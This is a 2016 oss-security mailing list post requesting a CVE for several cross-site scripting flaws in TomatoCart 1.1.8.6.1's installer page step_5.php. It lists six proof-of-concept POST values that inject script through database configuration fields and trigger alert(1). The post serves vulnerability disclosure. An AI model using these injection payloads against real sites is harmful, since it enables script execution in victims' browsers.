[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE request - TomatoCart 1.1.8.6.1 Multiple Cross-Site Scripting (XSS)
From:       haojun hou <haojunhou () gmail ! com>
Date:       2016-11-24 7:25:10
Message-ID: 60EBD88B-40E8-47F9-B959-F8500C994D59 () gmail ! com
[Download RAW message or body]


Hi:
TomatoCart 1.1.8.6.1 - Multiple Cross-Site Scripting (XSS) 

Procuct: TomatoCart

Vendor: TomatoCart http://www.tomatocart.com

Vunlerable Version: 1.1.8.6.1 and probably prior

Tested Version: 1.1.8.6.1

Author: Haojun Hou in ADLab of Venustech

 

Advisory Details:

Haojun Hou in ADLab of Venustech discovered Multiple Cross-Site Scripting (XSS) in TomatoCart \
1.1.8.6.1, which can be exploited to add,modify or delete information in application`s database \
and gain complete control over the application.

 

The vulnerability exists due to insufficientfiltration of user-supplied data in multiple HTTP \
POST parameters passed to \
¡°TomatoCart-v1-released-v1.1.8.6.1/install/templates/pages/step_5.php¡± url. An attacker could \
execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation examples below uses the "alert()" JavaScript function to see a  pop-up \
messagebox:

(1)POST

DB_DATABASE=  <>"?>";</script><script>alert(1);</script><script>"<?php"

(2)POST

DB_SERVER_PASSWORD= "?>";</script><script>alert(1);</script><script>"<?php"

(3)POST

DB_TABLE_PREFIX= "?>";</script><script>alert(1);</script><script>"<?php"

(4)POST

DB_DATABASE_CLASS= "?>";</script><script>alert(1);</script><script>"<?php"

(5)POST

DB_SERVER_USERNAME= "?>";</script><script>alert(1);</script><script>"<?php"

(6)POST

DB_SERVER= "?>";</script><script>alert(1);</script><script>"<?php"

 

Could you please help me assign a CVE for this issue?



 



[prev in list] [next in list] [prev in thread] [next in thread]